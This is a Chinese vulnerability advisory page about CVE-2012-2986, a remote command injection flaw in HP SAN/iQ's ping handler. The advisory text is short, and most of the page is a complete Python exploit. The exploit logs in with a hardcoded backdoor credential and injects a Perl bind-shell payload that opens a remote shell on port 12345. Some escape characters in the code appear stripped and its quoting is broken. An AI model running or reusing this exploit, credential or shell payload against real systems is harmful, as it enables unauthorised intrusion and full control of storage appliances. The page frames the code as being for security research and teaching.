Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / HP SAN/iQ多个远程命令注入漏洞

发布日期:2012-08-17
更新日期:2012-08-23受影响系统:
HP SAN/iQ < 9.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55133
CVE ID: CVE-2012-2986SAN是一种更加强大、可靠和可扩展的数据架构。HP Virtual SAN Appliance上HP SAN/iQ 9.5中的lhn/public/network/ping在实现上存在安全漏洞,可允许远程已验证用户通过第一、三、四个参数中的Shell元字符执行任意命令。<*来源:Tenable Network Security
 
  链接:http://www.kb.cert.org/vuls/id/441363
        http://www.exploit-db.com/exploits/18901/
        http://www.exploit-db.com/exploits/18893/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python""" ==================================
          Pseudo documentation
================================== """# HP VSA / SANiQ Hydra client
# Nicolas Gréire <nicolas.gregoire@agarri.fr>
# v0.5""" ==================================
          Target information
================================== """HOST = "192.168.201.11" # The remote host
PORT = 13838        # The hydra port""" ==================================
             Imports
================================== """import getopt
import re
import sys
import binascii
import struct
import socket
import os""" ==================================
        Define functions
================================== """# Some nice formatting
def zprint(str):
    print "[=] " + str# Define packets
def send_Exec():
    zprint("Send Exec")
    
    # RESTRICTIONS
    # You can"t use "/" in the payload
    # No Netcat/Ruby/PHP, but telnet/bash/perl are available    # METASPLOIT PAYLOAD
    cmd = "perl -MIO -e "$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,12345,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>""    # COMMAND INJECTION BUG
    data = "get:/lhn/public/network/ping/127.0.0.1/foobar;" + cmd + "/"    # EXPLOIT
    zprint("Now connect to port 12345 of machine " + str(HOST))
    send_packet(data)def send_Login():
    zprint("Send Login")
    data = "login:/global$agent/L0CAlu53R/Version "8.5.0"" # Backdoor
    send_packet(data)# Define the sending function
def send_packet(message):    # Add header
    ukn1 = "x00x00x00x00x00x00x00x01"
    ukn2 = "x00x00x00x00" + "x00x00x00x00x00x00x00x00" + "x00x00x00x14xffxffxffxff"
    message = message + "x00"
    data = ukn1 + struct.pack("!I", len(message)) + ukn2 + message    # Send & receive
    s.send(data)
    data = s.recv(1024)
    zprint("Received : [" + data + "]")""" ==================================
           Main code
================================== """# Print bannner
zprint("HP Hydra client")
zprint("Attacking host " + HOST + " on port " + str(PORT))# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((HOST, PORT))# Attack !
send_Login()
send_Exec()# Deconnect
s.close# Exit
zprint("Exit")建议:
--------------------------------------------------------------------------------
厂商补丁:HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://itrc.hp.comGoogle Chrome OS 远程代码执行漏洞(CVE-2012-2864)Lattice Diamond Programmer缓冲区溢出漏洞相关资讯      SAN  远程命令注入漏洞  SAN漏洞 
  • Microsoft IIS FTP服务远程命令注  (11/14/2012 19:13:31)
  • HP SAN/iQ远程命令注入漏洞  (08/23/2012 07:23:01)
  • Cisco TelePresence Recording   (07/13/2012 08:03:57)
  • cgit "syntax-highlighting.sh"远  (10/31/2012 08:37:35)
  • Cisco Linksys WMB54G远程命令注入  (07/24/2012 08:28:26)
  • Cisco TelePresence Immersive   (07/13/2012 08:03:19)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款